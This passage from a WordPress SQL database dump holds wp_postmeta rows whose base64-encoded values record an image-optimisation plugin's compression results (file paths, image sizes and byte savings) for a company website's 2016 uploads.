TAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS01MDUtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktNTA1LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxNjI5LCJ0aW1lIjoxNDgzNTUxNjM4LCJpZCI6MTkxOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS01MDUtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktNTA1LTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLTUwNS0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NjM1LCJ0aW1lIjoxNDgzNTUxNjQyLCJpZCI6MTkxOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS01MDUtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktNTA1LTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLTUwNS00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6ODE3LCJ0aW1lIjoxNDgzNTUxNjQ1LCJpZCI6MTkxOH1d'); 
INSERT INTO `wp_postmeta` VALUES (28996, 1917, 'wpfc_optimisation_reduction', '23717'); 
INSERT INTO `wp_postmeta` VALUES (28997, 1917, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTExNi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS0xMTYuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU1MTY0OSwiaWQiOiIxOTE3In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktMTE2LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTExNi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hFTE9YWS0xMTYtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjk2MCwidGltZSI6MTQ4MzU1MTY1MywiaWQiOjE5MTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTExNi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS0xMTYtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktMTE2LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoyOTg0LCJ0aW1lIjoxNDgzNTUxNjU2LCJpZCI6MTkxN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktMTE2LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTExNi03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hFTE9YWS0xMTYtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjI2MjUsInRpbWUiOjE0ODM1NTE2NjAsImlkIjoxOTE3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS0xMTYtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTExNi0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLTExNi0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMTk4MywidGltZSI6MTQ4MzU1MTY2NCwiaWQiOjE5MTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTExNi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS0xMTYtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktMTE2LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1ODQsInRpbWUiOjE0ODM1NTE2NjcsImlkIjoxOTE3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS0xMTYtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktMTE2LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLTExNi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDg3LCJ0aW1lIjoxNDgzNTUxNjcwLCJpZCI6MTkxN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktMTE2LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTExNi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hFTE9YWS0xMTYtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjU3MiwidGltZSI6MTQ4MzU1MTY3NCwiaWQiOjE5MTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTExNi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS0xMTYtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktMTE2LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxOTI2LCJ0aW1lIjoxNDgzNTUxNjc3LCJpZCI6MTkxN30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS0xMTYtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktMTE2LTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLTExNi0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NjY5LCJ0aW1lIjoxNDgzNTUxNjgwLCJpZCI6MTkxN30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS0xMTYtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktMTE2LTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLTExNi00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6OTI3LCJ0aW1lIjoxNDgzNTUxNjg0LCJpZCI6MTkxN31d'); 
INSERT INTO `wp_postmeta` VALUES (28998, 1916, 'wpfc_optimisation_reduction', '8752'); 
INSERT INTO `wp_postmeta` VALUES (28999, 1916, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzkwMTEzNDc5LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzkwMTEzNDc5LmpwZyIsIndpZHRoIjo0OTI4LCJoZWlnaHQiOjMyNjQsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTE2ODgsImlkIjoiMTkxNiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzkwMTEzNDc5LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzkwMTEzNDc5LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzkwMTEzNDc5LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo1MjMsInRpbWUiOjE0ODM1NTE2OTIsImlkIjoxOTE2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja185MDExMzQ3OS04MDB4NTMwLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja185MDExMzQ3OS04MDB4NTMwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja185MDExMzQ3OS04MDB4NTMwLmpwZyIsInJlZHVjdGlvbiI6ODM2LCJ0aW1lIjoxNDgzNTUxNjk2LCJpZCI6MTkxNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfOTAxMTM0NzktNzY4eDUwOS5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUwOSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfOTAxMTM0NzktNzY4eDUwOS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfOTAxMTM0NzktNzY4eDUwOS5qcGciLCJyZWR1Y3Rpb24iOjg1MCwidGltZSI6MTQ4MzU1MTcwMCwiaWQiOjE5MTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzkwMTEzNDc5LTE2MDB4MTA2MC5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDYwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja185MDExMzQ3OS0xNjAweDEwNjAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzkwMTEzNDc5LTE2MDB4MTA2MC5qcGciLCJyZWR1Y3Rpb24iOjI1NjEsInRpbWUiOjE0ODM1NTE3MDUsImlkIjoxOTE2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja185MDExMzQ3OS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja185MDExMzQ3OS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja185MDExMzQ3OS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTQ3LCJ0aW1lIjoxNDgzNTUxNzA4LCJpZCI6MTkxNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfOTAxMTM0NzktMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfOTAxMTM0NzktMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfOTAxMTM0NzktMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQ0NiwidGltZSI6MTQ4MzU1MTcxMSwiaWQiOjE5MTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzkwMTEzNDc5LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzkwMTEzNDc5LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzkwMTEzNDc5LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0ODIsInRpbWUiOjE0ODM1NTE3MTUsImlkIjoxOTE2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja185MDExMzQ3OS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja185MDExMzQ3OS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja185MDExMzQ3OS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6NjUxLCJ0aW1lIjoxNDgzNTUxNzE4LCJpZCI6MTkxNn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja185MDExMzQ3OS0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja185MDExMzQ3OS0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja185MDExMzQ3OS0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6Nzk0LCJ0aW1lIjoxNDgzNTUxNzIyLCJpZCI6MTkxNn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja185MDExMzQ3OS00NTB4Mjk4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja185MDExMzQ3OS00NTB4Mjk4LmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMjk4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja185MDExMzQ3OS00NTB4Mjk4LmpwZyIsInJlZHVjdGlvbiI6MTA2MiwidGltZSI6MTQ4MzU1MTcyNiwiaWQiOjE5MTZ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29000, 1915, 'wpfc_optimisation_reduction', '23277'); 
INSERT INTO `wp_postmeta` VALUES (29001, 1915, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTEwNy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS0xMDcuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU1MTczMCwiaWQiOiIxOTE1In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktMTA3LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTEwNy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hFTE9YWS0xMDctMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjg3NCwidGltZSI6MTQ4MzU1MTczNCwiaWQiOjE5MTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTEwNy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS0xMDctODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iY